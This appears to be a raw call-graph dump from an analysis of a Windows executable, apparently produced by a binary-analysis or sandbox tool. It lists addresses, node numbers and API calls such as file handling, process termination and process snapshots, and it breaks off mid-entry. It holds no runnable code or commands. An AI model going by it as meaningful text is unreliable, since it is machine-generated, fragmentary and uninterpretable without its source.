1a9642 99194->99196 99228 19f656 20 API calls __dosmaperr 99195->99228 99198 1a96f6 99196->99198 99202 1a967a 99196->99202 99233 19f656 20 API calls __dosmaperr 99198->99233 99199 1a962f 99229 19f669 20 API calls __dosmaperr 99199->99229 99218 1a54d7 EnterCriticalSection 99202->99218 99203 1a96fb 99234 19f669 20 API calls __dosmaperr 99203->99234 99206 1a9680 99208 1a96b9 99206->99208 99209 1a96a4 99206->99209 99207 1a9703 99235 1a2b7c 26 API calls pre_c_initialization 99207->99235 99219 1a971b 99208->99219 99230 19f669 20 API calls __dosmaperr 99209->99230 99213 1a96a9 99231 19f656 20 API calls __dosmaperr 99213->99231 99214 1a9637 __fread_nolock 99214->99187 99215 1a96b4 99232 1a96ee LeaveCriticalSection __wsopen_s 99215->99232 99218->99206 99220 1a5754 __wsopen_s 26 API calls 99219->99220 99221 1a972d 99220->99221 99222 1a9746 SetFilePointerEx 99221->99222 99223 1a9735 99221->99223 99224 1a975e GetLastError 99222->99224 99225 1a973a 99222->99225 99236 19f669 20 API calls __dosmaperr 99223->99236 99237 19f633 20 API calls __dosmaperr 99224->99237 99225->99215 99228->99199 99229->99214 99230->99213 99231->99215 99232->99214 99233->99203 99234->99207 99235->99214 99236->99225 99237->99225 100436 180e6f 100437 180e83 100436->100437 100443 1813d5 100436->100443 100438 19016b 8 API calls 100437->100438 100441 180e95 100437->100441 100438->100441 100439 1c55d0 100469 1e1a29 8 API calls 100439->100469 100440 17b3fe 8 API calls 100440->100441 100441->100439 100441->100440 100442 180eee 100441->100442 100445 182ad0 230 API calls 100442->100445 100461 18044d messages 100442->100461 100443->100441 100446 17be6d 8 API calls 100443->100446 100467 180326 messages 100445->100467 100446->100441 100447 1c62cf 100473 1e3ef6 81 API calls __wsopen_s 100447->100473 100448 181e00 40 API calls 100448->100467 100449 181645 100454 17be6d 8 API calls 100449->100454 100449->100461 100450 19016b 8 API calls 100450->100467 100452 1c5c7f 100458 17be6d 8 API calls 100452->100458 100452->100461 100453 1c61fe 100472 1e3ef6 81 API calls __wsopen_s 100453->100472 100454->100461 100457 181940 230 API calls 100457->100467 100458->100461 100459 17be6d 8 API calls 100459->100467 100460 17bf07 8 API calls 100460->100467 100462 190433 29 API calls pre_c_initialization 100462->100467 100463 1905d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 100463->100467 100464 1c60b9 100470 1e3ef6 81 API calls __wsopen_s 100464->100470 100466 180a5e messages 100471 1e3ef6 81 API calls __wsopen_s 100466->100471 100467->100447 100467->100448 100467->100449 100467->100450 100467->100452 100467->100453 100467->100457 100467->100459 100467->100460 100467->100461 100467->100462 100467->100463 100467->100464 100467->100466 100468 190588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 100467->100468 100468->100467 100469->100461 100470->100466 100471->100461 100472->100461 100473->100461 100474 1815af 100475 18e34f 8 API calls 100474->100475 100476 1815c5 100475->100476 100481 18e3b3 100476->100481 100478 1815ef 100493 1e3ef6 81 API calls __wsopen_s 100478->100493 100480 1c61ab 100482 177a14 8 API calls 100481->100482 100483 18e3ea 100482->100483 100484 18e41b 100483->100484 100485 17b25f 8 API calls 100483->100485 100484->100478 100486 1ce4e4 100485->100486 100487 177af4 8 API calls 100486->100487 100488 1ce4ef 100487->100488 100494 18e73b 39 API calls 100488->100494 100490 1ce502 100491 17b3fe 8 API calls 100490->100491 100492 1ce506 100490->100492 100491->100492 100492->100492 100493->100480 100494->100490 100495 1b27a2 100498 172a52 100495->100498 100499 172a91 mciSendStringW 100498->100499 100500 1b39f4 DestroyWindow 100498->100500 100501 172aad 100499->100501 100502 172d08 100499->100502 100511 1b3a00 100500->100511 100503 172abb 100501->100503 100501->100511 100502->100501 100504 172d17 UnregisterHotKey 100502->100504 100530 172e70 100503->100530 100504->100502 100506 1b3a45 100512 1b3a69 100506->100512 100513 1b3a58 FreeLibrary 100506->100513 100507 1b3a1e FindClose 100507->100511 100509 177953 FindCloseChangeNotification 100509->100511 100510 172ad0 100510->100512 100517 172ade 100510->100517 100511->100506 100511->100507 100511->100509 100514 1b3a7d VirtualFree 100512->100514 100519 172b4b 100512->100519 100513->100506 100514->100512 100515 172b3a OleUninitialize 100515->100519 100516 1b3ac5 100522 1b3ad4 messages 100516->100522 100536 1e3c45 6 API calls messages 100516->100536 100517->100515 100519->100516 100520 172b56 100519->100520 100534 172f86 VirtualFreeEx CloseHandle 100520->100534 100526 1b3b63 100522->100526 100537 1d6d63 8 API calls messages 100522->100537 100524 172b7c 100524->100522 100525 172c61 100524->100525 100525->100526 100527 172caf 100525->100527 100526->100526 100527->100526 100535 172eb8 CloseHandle InternetCloseHandle InternetCloseHandle WaitForSingleObject 100527->100535 100529 172d03 100531 172e7d 100530->100531 100532 172ac2 100531->100532 100538 1d78b9 8 API calls 100531->100538 100532->100506 100532->100510 100534->100524 100535->100529 100536->100516 100537->100522 100538->100531 99238 17f48c 99241 17ca50 99238->99241 99242 17ca6b 99241->99242 99243 1c14af 99242->99243 99244 1c1461 99242->99244 99268 17ca90 99242->99268 99305 1f61ff 230 API calls 2 library calls 99243->99305 99247 1c146b 99244->99247 99250 1c1478 99244->99250 99244->99268 99303 1f6690 230 API calls 99247->99303 99264 17cd60 99250->99264 99304 1f6b2d 230 API calls 2 library calls 99250->99304 99252 18e781 39 API calls 99252->99268 99255 17cf30 39 API calls 99255->99268 99256 1c1742 99256->99256 99259 17cd8e 99260 1c168b 99307 1f6569 81 API calls 99260->99307 99263 17bdc1 39 API calls 99263->99268 99264->99259 99308 1e3ef6 81 API calls __wsopen_s 99264->99308 99267 17b3fe 8 API calls 99267->99268 99268->99252 99268->99255 99268->99259 99268->99260 99268->99263 99268->99264 99268->99267 99270 17be6d 8 API calls 99268->99270 99272 1802f0 99268->99272 99295 18e73b 39 API calls 99268->99295 99296 18aa19 230 API calls 99268->99296 99297 1905d2 5 API calls __Init_thread_wait 99268->99297 99298 18bbd2 8 API calls 99268->99298 99299 190433 29 API calls __onexit 99268->99299 99300 190588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99268->99300 99301 18f4ed 81 API calls 99268->99301 99302 18f354 230 API calls 99268->99302 99306 1cff4f 8 API calls 99268->99306 99270->99268 99290 180326 messages 99272->99290 99273 19016b 8 API calls 99273->99290 99274 190433 29 API calls pre_c_initialization 99274->99290 99275 1c62cf 99384 1e3ef6 81 API calls __wsopen_s 99275->99384 99277 181645 99282 17be6d 8 API calls 99277->99282 99289 18044d messages 99277->99289 99279 1c5c7f 99286 17be6d 8 API calls 99279->99286 99279->99289 99280 1c61fe 99383 1e3ef6 81 API calls __wsopen_s 99280->99383 99281 17be6d 8 API calls 99281->99290 99282->99289 99286->99289 99287 1905d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 99287->99290 99288 17bf07 8 API calls 99288->99290 99289->99268 99290->99273 99290->99274 99290->99275 99290->99277 99290->99279 99290->99280 99290->99281 99290->99287 99290->99288 99290->99289 99291 1c60b9 99290->99291 99292 190588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 99290->99292 99294 180a5e messages 99290->99294 99309 181940 99290->99309 99371 181e00 99290->99371 99381 1e3ef6 81 API calls __wsopen_s 99291->99381 99292->99290 99382 1e3ef6 81 API calls __wsopen_s 99294->99382 99295->99268 99296->99268 99297->99268 99298->99268 99299->99268 99300->99268 99301->99268 99302->99268 99303->99250 99304->99264 99305->99268 99306->99268 99307->99264 99308->99256 99310 1819de 99309->99310 99311 181966 99309->99311 99314 1c69f1 99310->99314 99327 1819ed 99310->99327 99312 1c6b04 99311->99312 99313 181973 99311->99313 99401 1f84db 230 API calls 2 library calls 99312->99401 99322 1c6b28 99313->99322 99323 18197d 99313->99323 99316 1c69fc 99314->99316 99317 1c6af8 99314->99317 99399 18b2d6 230 API calls 99316->99399 99400 1e3ef6 81 API calls __wsopen_s 99317->99400 99320 1c6b59 99324 1c6b64 99320->99324 99325 1c6b86 99320->99325 99321 1802f0 230 API calls 99321->99327 99322->99320 99332 1c6b40 99322->99332 99331 17be6d 8 API calls 99323->99331 99370 181990 messages 99323->99370 99403 1f84db 230 API calls 2 library calls 99324->99403 99404 1f5fe6 8 API calls 99325->99404 99326 1c691d 99398 1e3ef6 81 API calls __wsopen_s 99326->99398 99327->99321 99327->99326 99330 181b65 99327->99330 99335 1c68ac 99327->99335 99346 181b59 99327->99346 99354 181aa4 99327->99354 99327->99370 99330->99290 99331->99370 99402 1e3ef6 81 API calls __wsopen_s 99332->99402 99333 1c6d7d 99341 1c6db3 99333->99341 99477 1f80ce 65 API calls 99333->99477 99334 1c6b91 99339 1c6c25 99334->99339 99350 1c6bac 99334->99350 99397 1e3ef6 81 API calls __wsopen_s 99335->99397 99474 1e19ed 8 API calls 99339->99474 99344 17b3fe 8 API calls 99341->99344 99342 1c6d5b 99347 178e70 52 API calls 99342->99347 99369 1819d3 messages 99344->99369 99345 17be6d 8 API calls 99345->99370 99346->99330 99396 1e3ef6 81 API calls __wsopen_s 99346->99396 99361 1c6d63 _wcslen 99347->99361 99348 1c6d91 99351 178e70 52 API calls 99348->99351 99405 1e13a0 8 API calls 99350->99405 99365 1c6d99 _wcslen 99351->99365 99353 1c68c1 messages 99353->99326 99366 181b12 messages 99353->99366 99353->99369 99354->99346 99385 181c50 99354->99385 99356 1c6c37 99359 17bc9b 8 API calls 99356->99359 99358 181b05 99358->99346 99358->99366 99360 1c6c40 99359->99360 99475 1e13a0 8 API calls 99360->99475 99361->99333 99363 17b3fe 8 API calls 99361->99363 99362 1c6bd6 99406 182ad0 99362->99406 99363->99333 99365->99341 99367 17b3fe 8 API calls 99365->99367 99366->99345 99366->99369 99366->99370 99367->99341 99369->99290 99370->99333 99370->99369 99476 1f7f8f 53 API calls __wsopen_s 99370->99476 99373 181e1d messages 99371->99373 99372 181fa7 messages 99372->99290 99373->99372 99374 1824c2 99373->99374 99377 1c77db 99373->99377 99380 1c760f 99373->99380 100087 18e29c 8 API calls messages 99373->100087 99374->99372 100089 18bd82 39 API calls 99374->100089 99377->99372 100088 19d2f5 39 API calls 99377->100088 100086 19d2f5 39 API calls 99380->100086 99381->99294 99382->99289 99383->99289 99384->99289 99386 181c62 99385->99386 99387 181d20 99386->99387 99389 181c6b 99386->99389 99478 18b71c 8 API calls 99386->99478 99387->99358 99389->99387 99390 19016b 8 API calls 99389->99390 99391 181d89 99390->99391 99392 19016b 8 API calls 99391->99392 99393 181d92 99392->99393 99394 17b25f 8 API calls 99393->99394 99395 181da1 99394->99395 99395->99358 99396->99369 99397->99353 99398->99370 99399->99366 99400->99312 99401->99370 99402->99369 99403->99370 99404->99334 99405->99362 99407 182f70 99406->99407 99408 182b36 99406->99408 99697 1905d2 5 API calls __Init_thread_wait 99407->99697 99409 1c7b7c 99408->99409 99410 182b50 99408->99410 99701 1f79f9 230 API calls 99409->99701 99413 1830e0 9 API calls 99410->99413 99412 182f7a 99415 182fbb 99412->99415 99418 17b25f 8 API calls 99412->99418 99416 182b60 99413->99416 99422 1c7b91 99415->99422 99423 182fec 99415->99423 99419 1830e0 9 API calls 99416->99419 99417 1c7b88 99417->99370 99427 182f94 99418->99427 99420 182b76 99419->99420 99420->99415 99421 182bac 99420->99421 99421->99422 99446 182bc8 __fread_nolock 99421->99446 99702 1e3ef6 81 API calls __wsopen_s 99422->99702 99425 17b3fe 8 API calls 99423->99425 99426 182ff9 99425->99426 99699 18e662 230 API calls 99426->99699 99698 190588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99427->99698 99430 1c7bb9 99703 1e3ef6 81 API calls __wsopen_s 99430->99703 99432 182cef 99433 1c7c1c 99432->99433 99434 182cfc 99432->99434 99705 1f60a2 53 API calls _wcslen 99433->99705 99435 1830e0 9 API calls 99434->99435 99437 182d09 99435->99437 99440 1c7d45 99437->99440 99442 1830e0 9 API calls 99437->99442 99438 19016b 8 API calls 99438->99446 99439 19019b 8 API calls 99439->99446 99450 1c7bb4 99440->99450 99706 1e3ef6 81 API calls __wsopen_s 99440->99706 99441 183032 99700 18fe59 8 API calls 99441->99700 99448 182d23 99442->99448 99445 1802f0 230 API calls 99445->99446 99446->99426 99446->99430 99446->99432 99446->99438 99446->99439 99446->99445 99447 1c7bfd 99446->99447 99446->99450 99704 1e3ef6 81 API calls __wsopen_s 99447->99704 99448->99440 99451 17be6d 8 API calls 99448->99451 99454 182d87 messages 99448->99454 99450->99370 99451->99454 99452 1830e0 9 API calls 99452->99454 99453 182edd 99453->99370 99454->99440 99454->99441 99454->99450 99454->99452 99455 182e3b messages 99454->99455 99458 177953 FindCloseChangeNotification 99454->99458 99479 1f9eea 99454->99479 99482 1e65b4 99454->99482 99487 1feb63 99454->99487 99523 1de9c5 GetFileAttributesW 99454->99523 99525 18be75 99454->99525 99582 1ede5d 99454->99582 99587 1e95f6 99454->99587 99602 1fa4b4 99454->99602 99608 1e6d2d 99454->99608 99621 18f95e 99454->99621 99628 1e8e39 99454->99628 99647 1fa8ae 99454->99647 99655 1e276a 99454->99655 99659 1e4ad5 99454->99659 99664 1e874a 99454->99664 99691 1fac49 99454->99691 99455->99453 99696 18e29c 8 API calls messages 99455->99696 99458->99454 99474->99356 99475->99370 99476->99342 99477->99348 99478->99389 99707 1f88b6 99479->99707 99481 1f9efa 99481->99454 99483 178e70 52 API calls 99482->99483 99484 1e65c7 99483->99484 99818 1de387 lstrlenW 99484->99818 99486 1e65d1 99486->99454 99488 17bf07 8 API calls 99487->99488 99489 1feb7a 99488->99489 99490 178e70 52 API calls 99489->99490 99491 1feb89 99490->99491 99492 177a14 8 API calls 99491->99492 99493 1feb9c 99492->99493 99494 178e70 52 API calls 99493->99494 99495 1feba9 99494->99495 99496 1fec26 99495->99496 99497 1febc1 99495->99497 99498 178e70 52 API calls 99496->99498 99842 17c92d 99497->99842 99500 1fec2b 99498->99500 99502 1fec38 99500->99502 99503 1fec73 99500->99503 99501 1febc6 99501->99502 99505 1febdf 99501->99505 99504 176ab6 8 API calls 99502->99504 99506 1fec8b 99503->99506 99508 17c92d 39 API calls 99503->99508 99520 1fec45 99504->99520 99507 178685 8 API calls 99505->99507 99509 1feca4 99506->99509 99510 17c92d 39 API calls 99506->99510 99512 1febec 99507->99512 99508->99506 99511 17be6d 8 API calls 99509->99511 99510->99509 99513 1fecbe 99511->99513 99514 177af4 8 API calls 99512->99514 99823 1d9b57 99513->99823 99516 1febfa 99514->99516 99517 178685 8 API calls 99516->99517 99518 1fec13 99517->99518 99519 177af4 8 API calls 99518->99519 99522 1fec21 99519->99522 99520->99454 99847 177a59 99522->99847 99524 1de9d1 99523->99524 99524->99454 99526 176ab6 8 API calls 99525->99526 99527 18be8d 99526->99527 99528 19016b 8 API calls 99527->99528 99532 1c8f7a 99527->99532 99530 18bea6 99528->99530 99531 19019b 8 API calls 99530->99531 99533 18beb7 99531->99533 99572 18bf1f 99532->99572 99872 1ea607 39 API calls 99532->99872 99534 177953 FindCloseChangeNotification 99533->99534 99535 18bec2 99534->99535 99537 17bf07 8 API calls 99535->99537 99536 17c92d 39 API calls 99538 1c8fdc 99536->99538 99539 18beca 99537->99539 99540 18bf2c 99538->99540 99541 1c8fe4 99538->99541 99542 177953 FindCloseChangeNotification 99539->99542 99543 18fdc9 3 API calls 99540->99543 99544 17c92d 39 API calls 99541->99544 99545 18bed1 99542->99545 99549 18bf33 99543->99549 99544->99549 99546 178e70 52 API calls 99545->99546 99547 18bedd 99546->99547 99548 177953 FindCloseChangeNotification 99547->99548 99550 18bee7 99548->99550 99551 1c8ff9 99549->99551 99552 18bf4e 99549->99552 99554 176e52 5 API calls 99550->99554 99553 19019b 8 API calls 99551->99553 99555 177a14 8 API calls 99552->99555 99557 1c8ffe 99553->99557 99558 18bef8 99554->99558 99556 18bf56 99555->99556 99854 18bfbc 99556->99854 99562 1c9012 99557->99562 99564 1741c9 2 API calls 99557->99564 99559 18bf00 99558->99559 99560 1c8f72 99558->99560 99567 176b12 13 API calls 99559->99567 99871 177923 FindCloseChangeNotification messages 99560->99871 99570 1c9016 __fread_nolock 99562->99570 99873 1e1759 99562->99873 99563 18bf65 99568 177a59 8 API calls 99563->99568 99563->99570 99564->99562 99569 18bf0e 99567->99569 99573 18bf79 99568->99573 99868 176afb SetFilePointerEx SetFilePointerEx SetFilePointerEx 99569->99868 99572->99536 99572->99540 99576 18bfb3 99573->99576 99577 177953 FindCloseChangeNotification 99573->99577 99574 1c8f3b 99870 1dd4bf SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 99574->99870 99575 18bf15 99575->99572 99575->99574 99576->99454 99579 18bfa7 99577->99579 99579->99576 99869 177923 FindCloseChangeNotification messages 99579->99869 99580 1c8f52 99580->99572 99583 17b3fe 8 API calls 99582->99583 99584 1ede70 99583->99584 99909 1e183b 99584->99909 99586 1ede78 99586->99454 99588 17bf07 8 API calls 99587->99588 99589 1e9607 99588->99589 99590 178e70 52 API calls 99589->99590 99591 1e9616 99590->99591 99592 17557e 9 API calls 99591->99592 99593 1e9621 99592->99593 99594 178e70 52 API calls 99593->99594 99595 1e962e 99594->99595 99596 178e70 52 API calls 99595->99596 99597 1e9640 99596->99597 99598 178e70 52 API calls 99597->99598 99599 1e9655 WritePrivateProfileStringW 99598->99599 99600 1e966b WritePrivateProfileStringW 99599->99600 99601 1e9677 99599->99601 99600->99601 99601->99454 99606 1fa4c7 99602->99606 99603 178e70 52 API calls 99604 1fa534 99603->99604 99929 1e17be 99604->99929 99606->99603 99607 1fa4d6 99606->99607 99607->99454 99609 178e70 52 API calls 99608->99609 99610 1e6d47 99609->99610 99611 1e6d84 99610->99611 99612 17c92d 39 API calls 99610->99612 99970 1de783 99611->99970 99614 1e6d76 99612->99614 99614->99611 99616 17557e 9 API calls 99614->99616 99615 1e6d92 99617 177a59 8 API calls 99615->99617 99616->99611 99620 1e6dd7 99617->99620 99619 178e70 52 API calls 99619->99615 99620->99454 99622 17c92d 39 API calls 99621->99622 99623 18f972 99622->99623 99624 18f97a timeGetTime 99623->99624 99625 1cfac0 Sleep 99623->99625 99626 17c92d 39 API calls 99624->99626 99627 18f990 99626->99627 99627->99454 99629 17bf07 8 API calls 99628->99629 99630 1e8e4a 99629->99630 99631 19019b 8 API calls 99630->99631 99632 1e8e54 99631->99632 99633 1741a6 8 API calls 99632->99633 99634 1e8e5e 99633->99634 99635 178e70 52 API calls 99634->99635 99636 1e8e6d 99635->99636 99637 17557e 9 API calls 99636->99637 99638 1e8e78 99637->99638 99639 178e70 52 API calls 99638->99639 99640 1e8e85 99639->99640 99641 178e70 52 API calls 99640->99641 99642 1e8e97 99641->99642 99643 178e70 52 API calls 99642->99643 99644 1e8eac GetPrivateProfileStringW 99643->99644 99645 176ab6 8 API calls 99644->99645 99646 1e8ecf messages 99645->99646 99646->99454 99648 1fa8ca 99647->99648 99650 1fa90a 99647->99650 99648->99454 99649 1fa928 99649->99648 99651 17c92d 39 API calls 99649->99651 99653 1fa990 99649->99653 99650->99649 99652 17c92d 39 API calls 99650->99652 99651->99653 99652->99649 99975 1e0287 99653->99975 99656 1e2773 99655->99656 99658 1e2778 99655->99658 99657 1e183b 10 API calls 99656->99657 99657->99658 99658->99454 99660 178e70 52 API calls 99659->99660 99661 1e4ae8 99660->99661 100021 1dda81 99661->100021 99663 1e4af0 99663->99454 99665 1e875a __wsopen_s 99664->99665 99666 178e70 52 API calls 99665->99666 99667 1e877b 99666->99667 99668 17c92d 39 API calls 99667->99668 99674 1e8799 99667->99674 99668->99674 99669 178e70 52 API calls 99670 1e887c 99669->99670 99671 17557e 9 API calls 99670->99671 99672 1e88a7 99671->99672 100033 19d913 99672->100033 99674->99669 99680 1e8973 99674->99680 99675 1e88cd 99676 1e88f7 GetCurrentDirectoryW SetCurrentDirectoryW 99675->99676 99677 1e8921 99676->99677 99676->99680 99678 1de387 4 API calls 99677->99678 99679 1e892a 99678->99679 99679->99680 99681 1de9c5 GetFileAttributesW 99679->99681 99680->99454 99682 1e8938 99681->99682 99683 1e8940 GetFileAttributesW SetFileAttributesW 99682->99683 99689 1e89cb 99682->99689 99684 1e8969 SetCurrentDirectoryW 99683->99684 99685 1e89b1 99683->99685 99684->99680 99686 1e89b5 SetCurrentDirectoryW 99685->99686 99687 1e8a02 SetCurrentDirectoryW 99685->99687 99686->99689 99687->99680 100036 1e9f9f 11 API calls 99689->100036 99690 1e89ea 99690->99687 99692 178e70 52 API calls 99691->99692 99693 1fac65 99692->99693 100067 1ddc9c CreateToolhelp32Snapshot Process32FirstW 99693->100067 99695 1fac74 99695->99454 99696->99455 99697->99412 99698->99415 99699->99441 99700->99441 99701->99417 99702->99450 99703->99450 99704->99450 99705->99448 99706->99450 99708 178e70 52 API calls 99707->99708 99709 1f88ed 99708->99709 99711 1f8932 messages 99709->99711 99745 1f9632 99709->99745 99711->99481 99712 1f8dac 99790 1f9843 59 API calls 99712->99790 99713 1f8bec 99758 1f87e3 99713->99758 99716 1f8dbb 99716->99713 99717 1f8dc7 99716->99717 99717->99711 99718 178e70 52 API calls 99733 1f89a6 99718->99733 99723 1f8c25 99772 190000 99723->99772 99726 1f8c5f 99729 177d51 8 API calls 99726->99729 99727 1f8c45 99789 1e3ef6 81 API calls __wsopen_s 99727->99789 99732 1f8c6e 99729->99732 99730 1f8c50 GetCurrentProcess TerminateProcess 99730->99726 99731 1f8bde 99731->99712 99731->99713 99734 1783b0 8 API calls 99732->99734 99733->99711 99733->99718 99733->99731 99787 1d4a0c 8 API calls __fread_nolock 99733->99787 99788 1f8e7c 41 API calls _strftime 99733->99788 99735 1f8c87 99734->99735 99736 181c50 8 API calls 99735->99736 99744 1f8caf 99735->99744 99738 1f8c9e 99736->99738 99737 1f8e22 99737->99711 99739 1f8e36 FreeLibrary 99737->99739 99740 1f94da 74 API calls 99738->99740 99739->99711 99740->99744 99741 181c50 8 API calls 99741->99744 99743 17b3fe 8 API calls 99743->99744 99744->99737 99744->99741 99744->99743 99776 1f94da 99744->99776 99746 17c269 8 API calls 99745->99746 99747 1f964d CharLowerBuffW 99746->99747 99791 1d96e3 99747->99791 99751 17bf07 8 API calls 99752 1f9689 99751->99752 99753 178685 8 API calls 99752->99753 99754 1f969d 99753->99754 99755 1796d9 8 API calls 99754->99755 99757 1f96a7 _wcslen 99755->99757 99756 1f97bd _wcslen 99756->99733 99757->99756 99798 1f8e7c 41 API calls _strftime 99757->99798 99759 1f87fe 99758->99759 99763 1f8849 99758->99763 99760 19019b 8 API calls 99759->99760 99762 1f8820 99760->99762 99761 19016b 8 API calls 99761->99762 99762->99761 99762->99763 99764 1f99f5 99763->99764 99765 1f9c0a messages 99764->99765 99770 1f9a19 _strcat _wcslen ___std_exception_copy 99764->99770 99765->99723 99766 17c5df 39 API calls 99766->99770 99767 17c92d 39 API calls 99767->99770 99768 17c9fb 39 API calls 99768->99770 99769 178e70 52 API calls 99769->99770 99770->99765 99770->99766 99770->99767 99770->99768 99770->99769 99801 1df7da 10 API calls _wcslen 99770->99801 99773 190015 99772->99773 99774 1900ad TerminateProcess 99773->99774 99775 19007b 99773->99775 99774->99775 99775->99726 99775->99727 99777 1f94f2 99776->99777 99781 1f950e 99776->99781 99778 1f951a 99777->99778 99779 1f94f9 99777->99779 99780 1f95c3 99777->99780 99777->99781 99784 176ab6 8 API calls 99778->99784 99802 1df3fd 10 API calls _strlen 99779->99802 99817 1e15b3 72 API calls messages 99780->99817 99781->99744 99784->99781 99785 1f9503 99803 176ab6 99785->99803 99787->99733 99788->99733 99789->99730 99790->99716 99793 1d9703 _wcslen 99791->99793 99792 1d97f2 99792->99751 99792->99757 99793->99792 99794 1d9738 99793->99794 99795 1d97f7 99793->99795 99794->99792 99799 18e2e5 41 API calls 99794->99799 99795->99792 99800 18e2e5 41 API calls 99795->99800 99798->99756 99799->99794 99800->99795 99801->99770 99802->99785 99804 1b587b 99803->99804 99805 176ac6 99803->99805 99806 1b588c 99804->99806 99807 1784b7 8 API calls 99804->99807 99810 19016b 8 API calls 99805->99810 99808 17bceb 8 API calls 99806->99808 99807->99806 99809 1b5896 99808->99809 99809->99809 99811 176ad9 99810->99811 99812 176af4 99811->99812 99813 176ae2 99811->99813 99815 17bf07 8 API calls 99812->99815 99814 17b25f 8 API calls 99813->99814 99816 176aea 99814->99816 99815->99816 99816->99781 99817->99781 99819 1de3cf 99818->99819 99820 1de3a5 GetFileAttributesW 99818->99820 99819->99486 99820->99819 99821 1de3b1 FindFirstFileW 99820->99821 99821->99819 99822 1de3c2 FindClose 99821->99822 99822->99819 99824 17bf07 8 API calls 99823->99824 99825 1d9b6d 99824->99825 99826 177a14 8 API calls 99825->99826 99827 1d9b81 99826->99827 99828 1d96e3 41 API calls 99827->99828 99834 1d9ba3 99827->99834 99829 1d9b9d 99828->99829 99832 178685 8 API calls 99829->99832 99829->99834 99830 1d96e3 41 API calls 99830->99834 99831 178685 8 API calls 99831->99834 99832->99834 99833 177af4 8 API calls 99833->99834 99834->99830 99834->99831 99834->99833 99835 1d9c42 99834->99835 99838 1d9c26 99834->99838 99836 17be6d 8 API calls 99835->99836 99837 1d9c51 99835->99837 99836->99837 99837->99522 99839 178685 8 API calls 99838->99839 99840 1d9c36 99839->99840 99841 177af4 8 API calls 99840->99841 99841->99835 99843 17c93e 99842->99843 99844 17c945 99842->99844 99843->99844 99853 196661 39 API calls _strftime 99843->99853 99844->99501 99846 17c988 99846->99501 99848 177a65 99847->99848 99849 177a9e 99847->99849 99852 19016b 8 API calls 99848->99852 99850 177a78 99849->99850 99851 17be6d 8 API calls 99849->99851 99850->99520 99851->99850 99852->99850 99853->99846 99855 18c003 99854->99855 99856 18bfc7 99854->99856 99857 17bceb 8 API calls 99855->99857 99856->99855 99858 18bfd6 99856->99858 99864 1dd2ab 99857->99864 99859 18bfeb 99858->99859 99861 18bff8 99858->99861 99882 18c009 99859->99882 99860 1dd249 2 API calls 99860->99864 99889 1dd3b2 12 API calls 99861->99889 99863 1dd2da 99863->99563 99864->99860 99864->99863 99867 17acc0 8 API calls 99864->99867 99865 18bff4 99865->99563 99867->99864 99868->99575 99869->99576 99870->99580 99871->99532 99872->99532 99874 1e1764 99873->99874 99875 19016b 8 API calls 99874->99875 99876 1e176b 99875->99876 99877 1e1798 99876->99877 99878 1e1777 99876->99878 99880 19019b 8 API calls 99877->99880 99879 19019b 8 API calls 99878->99879 99881 1e1780 ___scrt_fastfail 99879->99881 99880->99881 99881->99570 99890 18c1f1 99882->99890 99887 178774 10 API calls 99888 18c03c 99887->99888 99888->99865 99889->99865 99891 19019b 8 API calls 99890->99891 99892 18c208 99891->99892 99893 19016b 8 API calls 99892->99893 99894 18c021 99893->99894 99895 17adc1 99894->99895 99901 18feaa 99895->99901 99897 17b050 2 API calls 99900 17add2 99897->99900 99899 17ae07 99899->99887 99899->99888 99900->99897 99900->99899 99908 17b0e3 8 API calls __fread_nolock 99900->99908 99902 18febb 99901->99902 99903 1cfe13 99901->99903 99902->99900 99904 19016b 8 API calls 99903->99904 99905 1cfe1d 99904->99905 99906 19019b 8 API calls 99905->99906 99907 1cfe32 99906->99907 99908->99900 99910 1e1852 99909->99910 99923 1e196b 99909->99923 99911 1e1872 99910->99911 99913 1e189f 99910->99913 99914 1e18b6 99910->99914 99911->99913 99916 1e1886 99911->99916 99912 19019b 8 API calls 99927 1e1894 __fread_nolock 99912->99927 99913->99912 99915 19019b 8 API calls 99914->99915 99924 1e18d3 99914->99924 99915->99924 99918 19019b 8 API calls 99916->99918 99917 1e18fa 99919 19019b 8 API calls 99917->99919 99918->99927 99920 1e1900 99919->99920 99922 18c1f1 8 API calls 99920->99922 99921 19016b 8 API calls 99921->99923 99925 1e190c 99922->99925 99923->99586 99924->99916 99924->99917 99924->99927 99928 18f9e2 10 API calls 99925->99928 99927->99921 99928->99927 99930 1e17cb 99929->99930 99931 19016b 8 API calls 99930->99931 99932 1e17d2 99931->99932 99935 1dfbca 99932->99935 99934 1e180c 99934->99607 99936 17c269 8 API calls 99935->99936 99937 1dfbdd CharLowerBuffW 99936->99937 99941 1dfbf0 99937->99941 99938 1dfc2e 99940 1dfc40 99938->99940 99942 17627c 8 API calls 99938->99942 99939 17627c 8 API calls 99939->99941 99943 19019b 8 API calls 99940->99943 99941->99938 99941->99939 99952 1dfbfa ___scrt_fastfail 99941->99952 99942->99940 99946 1dfc6e 99943->99946 99948 1dfc90 99946->99948 99968 1dfb02 8 API calls 99946->99968 99947 1dfccd 99949 19016b 8 API calls 99947->99949 99947->99952 99953 1dfd21 99948->99953 99950 1dfce7 99949->99950 99951 19019b 8 API calls 99950->99951 99951->99952 99952->99934 99954 17bf07 8 API calls 99953->99954 99955 1dfd53 99954->99955 99956 17bf07 8 API calls 99955->99956 99957 1dfd5c 99956->99957 99958 17bf07 8 API calls 99957->99958 99962 1dfd65 99958->99962 99959 1e0029 99959->99947 99960 1784b7 8 API calls 99960->99962 99961 196718 GetStringTypeW 99961->99962 99962->99959 99962->99960 99962->99961 99964 196661 39 API calls 99962->99964 99965 1dfd21 40 API calls 99962->99965 99966 17acc0 8 API calls 99962->99966 99967 17be6d 8 API calls 99962->99967 99969 196742 GetStringTypeW _strftime 99962->99969 99964->99962 99965->99962 99966->99962 99967->99962 99968->99946 99969->99962 99971 1b22f0 __wsopen_s 99970->99971 99972 1de790 GetShortPathNameW 99971->99972 99973 1784b7 8 API calls 99972->99973 99974 1de7b8 99973->99974 99974->99615 99974->99619 100007 1e01bf 99975->100007 99978 1e0308 100014 1e04fe 56 API calls __fread_nolock 99978->100014 99979 1e0320 99981 1e0386 99979->99981 99984 1e0330 99979->99984 99982 1e041c 99981->99982 99983 